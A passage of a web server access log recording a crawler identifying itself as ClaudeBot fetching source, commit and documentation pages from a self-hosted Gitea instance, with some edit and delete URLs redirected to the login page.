Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" [Client 216.73.216.188] [Length 11612] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html?display=rendered" [Client 216.73.216.188] [Length 10893] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 16081] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Ffallback_http_error.log" [Client 216.73.216.188] [Length 22198] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html?display=source" [Client 216.73.216.188] [Length 16434] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js?display=rendered" [Client 216.73.216.188] [Length 10958] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js?display=source" [Client 216.73.216.188] [Length 15604] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js" [Client 216.73.216.188] [Length 9841] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" [Client 216.73.216.188] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[15/Feb/2026:10:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fpackage.json" [Client 216.73.216.188] [Length 23538] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js" [Client 216.73.216.188] [Length 10716] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css" [Client 216.73.216.188] [Length 8470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10945] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcConnectionTest" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[15/Feb/2026:10:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 12775] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html%2Findex.html" [Client 216.73.216.188] [Length 41201] [Gzip 9.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcConnectionTest%2Fobj" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 24657] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" [Client 216.73.216.188] [Length 11853] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 15792] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 31504] [Gzip 6.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 12752] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FDebug%2Fnet8.0%2FOpcConnectionTest.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 21605] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/images" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py?display=source" [Client 216.73.216.188] [Length 20287] [Gzip 5.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" [Client 216.73.216.188] [Length 11307] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/images" -[15/Feb/2026:10:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16681] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py?display=rendered" [Client 216.73.216.188] [Length 10894] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html?display=rendered" [Client 216.73.216.188] [Length 14771] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html%2Fassets" [Client 216.73.216.188] [Length 18582] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 11894] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 14184] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" [Client 216.73.216.188] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 14122] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile?display=source" [Client 216.73.216.188] [Length 11591] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2FOpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 21787] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md?display=source" [Client 216.73.216.188] [Length 22140] [Gzip 6.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14469] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html%2Fstatus.json" [Client 216.73.216.188] [Length 16930] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10834] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" [Client 216.73.216.188] [Length 11846] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 17357] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11542] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2FOpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 21111] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" [Client 216.73.216.188] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 9864] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcConnectionTest%2FOpcConnectionTest.csproj" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py?display=rendered" [Client 216.73.216.188] [Length 10925] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/vite.config.ts" -[15/Feb/2026:10:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker?display=rendered" [Client 216.73.216.188] [Length 16027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" [Client 216.73.216.188] [Length 10853] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcConnectionTest%2Fobj" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 18134] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr 